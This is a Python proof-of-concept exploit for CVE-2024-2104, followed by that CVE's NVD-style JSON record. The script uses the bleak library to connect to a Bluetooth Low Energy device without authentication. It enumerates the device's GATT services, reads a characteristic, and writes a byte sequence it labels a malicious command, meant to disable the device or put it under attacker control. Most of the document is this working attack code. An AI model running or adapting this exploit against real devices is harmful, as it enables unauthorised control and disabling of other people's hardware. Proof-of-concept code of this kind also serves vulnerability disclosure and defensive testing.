CVE-2024-2104

# CVE-2024-2104 PoC - BLE GATT Security Misconfiguration # Author: Security Researcher # Description: Exploit for improper BLE GATT security configuration import asyncio from bleak import BleakClient from bleak.exc import BleakError TARGET_DEVICE = "XX:XX:XX:XX:XX:XX" # Target BLE device MAC address GATT_SERVICE_UUID = "0000fff0-0000-1000-8000-00805f9b34fb" GATT_CHAR_WRITE_UUID = "0000fff1-0000-1000-8000-00805f9b34fb" GATT_CHAR_READ_UUID = "0000fff2-0000-1000-8000-00805f9b34fb" async def exploit_ble_gatt(): """ Exploit improper BLE GATT security configuration This PoC demonstrates unauthorized read/write access to device controls """ try: print(f"[*] Connecting to target device: {TARGET_DEVICE}") # Connect without authentication (exploiting misconfiguration) client = BleakClient(TARGET_DEVICE, timeout=10.0) await client.connect() if not client.is_connected: print("[-] Failed to connect to device") return print("[+] Successfully connected without authentication!") print("[*] Exploiting improper BLE security configuration...") # Step 1: Enumerate services and characteristics print("\n[*] Enumerating GATT services...") for service in client.services: print(f" Service: {service.uuid} - {service.description}") for char in service.characteristics: print(f" Characteristic: {char.uuid} - {char.properties}") # Step 2: Read sensitive data from GATT characteristics print("\n[*] Reading device information...") try: data = await client.read_gatt_char(GATT_CHAR_READ_UUID) print(f"[+] Read data: {data.hex()}") except BleakError as e: print(f"[-] Read failed: {e}") # Step 3: Write control commands to device print("\n[*] Sending control commands...") # Example malicious command to disable device functionality malicious_command = bytes([0x01, 0x00, 0xFF, 0xFF, 0x00]) try: await client.write_gatt_char(GATT_CHAR_WRITE_UUID, malicious_command) print("[+] Malicious command sent successfully!") print("[*] Device may now be disabled or under attacker control") except BleakError as e: print(f"[-] Write failed: {e}") # Cleanup await client.disconnect() print("\n[*] Exploitation complete") except BleakError as e: print(f"[-] BLE Error: {e}") except Exception as e: print(f"[-] Unexpected error: {e}") if __name__ == "__main__": print("="*60) print("CVE-2024-2104 BLE GATT Security Misconfiguration PoC") print("="*60) asyncio.run(exploit_ble_gatt())

{"cve": {"id": "CVE-2024-2104", "sourceIdentifier": "[email protected]", "published": "2025-12-10T13:16:01.987", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to improper BLE security configurations on the device's GATT server, an adjacent unauthenticated attacker can read and write device control commands through the mobile app service wich could render the device unusable."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://certvde.com/en/advisories/VDE-2024-076", "source": "[email protected]"}, {"url": "https://harman.csaf-tp.certvde.com/.well-known/csaf/white/2025/hbsa-2025-0001.json", "source": "[email protected]"}]}}